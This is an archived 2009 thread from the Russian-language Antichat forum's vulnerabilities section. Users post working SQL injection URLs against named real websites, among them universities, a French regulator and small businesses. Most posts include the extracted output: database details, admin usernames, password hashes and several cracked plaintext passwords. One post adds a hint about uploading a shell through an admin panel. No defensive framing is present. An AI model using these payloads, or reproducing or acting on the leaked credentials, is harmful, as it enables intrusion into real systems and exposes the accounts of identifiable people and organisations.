ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #9751  
Старый 08.06.2009, 14:43
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 4]
Код:
http://www.foodanddrinkfest.com/index.php?id=-45+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16
5.0.77:foodfest_fest:foodfest_food@localhost

[PR 3]
Код:
http://www.foodmachineryonline.com/product_desc.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
4.1.22-standard-log:foodmactest:foodmactest@localhost

[PR 0]
Код:
http://auction.lebanese.us/product_desc.php?id=-38+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,28,30,31,32,33,34,35
4.1.22-max-log:LebAuction:LebAuction@97.74.144.146

[PR 0]
Код:
http://www.10000vacations.com/rentals/product_desc.php?id=1+union+select+1,2,concat_ws(0x3a,0x3c2f7469746c653e,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5.0.75-community-logroducx5_vacrentalsroducx5_rentals@localhost
 

  #9752  
Старый 08.06.2009, 15:10
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.pro-limit.com/displayitemv10comp.php?item_id=-5198+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+f rom+users+/*+

http://www.arcep.fr/index.php?id=2124&L=%29&tx_gsactualite_pi1[uid]=-1151+union+select+1,2,3,4,concat_ws(0x3a3a,usernam e,password),6,7,8+from+be_users--&tx_gsactualite_pi1[annee]=&tx_gsactualite_pi1[theme]=&tx_gsactualite_pi1[motscle]=&tx_gsactualite_pi1[backID]=24&cHash=7257875ce6
$typo_db_username = 'arcep'; // Modified or inserted by TYPO3 Install Tool.
$typo_db_password = 'arcep&sql'; // Modified or inserted by TYPO3 Install Tool.
arcep_blog_admin:73c6ff6a9178b1138f60eb0fb26e669f - XX23TXX
arcepadm:b91761c6674315b460a532a8b1f636df - QLT23TPP


http://demo.pegas-studio.net/ind.php?id_typ=-73+UnIoN+SeLeCt+1,2,3,4,5,6,7,Concat_ws(0x3a3a,Use rname,User_password,User_email),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28+from+phpb b_users+--+&tr=1

http://alvimed.com.ua/catalogue.php?action=viewitem&item_id=-34+union+select+1,2,3,4,5,6,7,database(),9+/*+
webkhark_alvimed
 

  #9753  
Старый 08.06.2009, 15:19
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

PR 4
http://www.gameszoo.org/voynichmonkeys/viewmsg.php?gr=1&num=15585+and+substring(version() ,1,1)=5
 

  #9754  
Старый 08.06.2009, 17:19
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Фух еле нашел русский сайт нехакнутый

http://www.allsportinfo.ru/
Цитата:
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,user(),version(),databa se()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25+LIMIT+600,1+--+
u55928@10.10.223.218
5.0.67-log
u55928


Таблы списком
Цитата:
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,table_name,column_name),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25+FROM+INFORMAT ION_SC HEMA.COLUMNS+LIMIT+777,1000+--+

Админы списком
Цитата:
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,login,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+FROM+dom_adminlogin+LIMIT+600,1000+--+
Лохин: silencer
Пасс: huivam

Лохин: mitkov
Пасс: gubitludeinepivo

Лохин: tulenkov
Пасс: arhivarius

Лохин: slusarenka
Пасс: vlitvunatankah


Админка стандартная просто дописываем Админ/
В админке можно залить шелл, только через картинку
 

  #9755  
Старый 08.06.2009, 17:42
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.vdiec.edu.in

Код:
http://www.vdiec.edu.in/go.php?show=about&id=-1+union+select+1,concat_ws(0x0b,version(),user(),database()),3,4,5,6
Версия - 4.1.22-STANDARD
Юзер - VDIEC_ROOT@LOCALHOST
БД - VDIEC_DATA

Путь до админы
Код:
http://www.vdiec.edu.in/admin/login.php
Доступна табличка - members (подбирайте...)
 

  #9756  
Старый 08.06.2009, 19:41
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://cms.wmhelp.com//index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user

http://www.sudeoptik.com/admin/

yunusemre@birpiksel.com:98d292620ce4e8087db271b691 e28a4c : 458796

Последний раз редактировалось Kimliksiz; 08.06.2009 в 19:45..
 

  #9757  
Старый 08.06.2009, 19:51
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

Код:
https://php.csumb.edu/infotech/brp/r_summary.php?id=-99999'+union+select+1,version(),3/*
Database Version: 5.0.45
Database name: brp
User name: brp@localhost
 

  #9758  
Старый 08.06.2009, 20:56
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

http://www.learn.unh.edu PR 5
Код:
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,version(),database(),user())/*
Database version: 5.0.45
Database name: 37560_learnunhedu
User name: 37560_user395554@lnh-www1b.bluehalo.myregisteredsite.com

AdminUsers:
Код:
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,username,password)+from+AdminUsers/*
username : admin
password : AA422kbolton

http://www.learn.unh.edu/admin
 

  #9759  
Старый 08.06.2009, 20:59
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Цитата:
http://www.neari.com/book.php?id=-32+union+select+1,concat_ws(0x3a,(select+name+from +users),(select+password+from+users),user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13,14+
вывод в титле

4я ветка.

Логин - diane
Пассворд - 4f8c0d28489d5d0ee78dc35f61347b24 - nearipress

Админки не нашел
 

  #9760  
Старый 08.06.2009, 21:04
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Код:
http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())
4.1.22:threejc:threejc@localhost
Код:
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())--&scat=25
5.0.77-сommunity:ga_news:venkat@174.120.39.50
Код:
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,password,file_priv)+from+mysql.user--&scat=25
Цитата:
root:*0525C96363D8CBCFC3E75DA251B92E10F9B43620:Y
Код:
http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11
Код:
http://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,version(),database(),user())
5.0.24a-Debian_9ubuntu2-log:ymis:root@localhost
Код:
http://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,user,password,file_priv)+from+mysql.user
Цитата:
root:40ede04861443872:Y
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ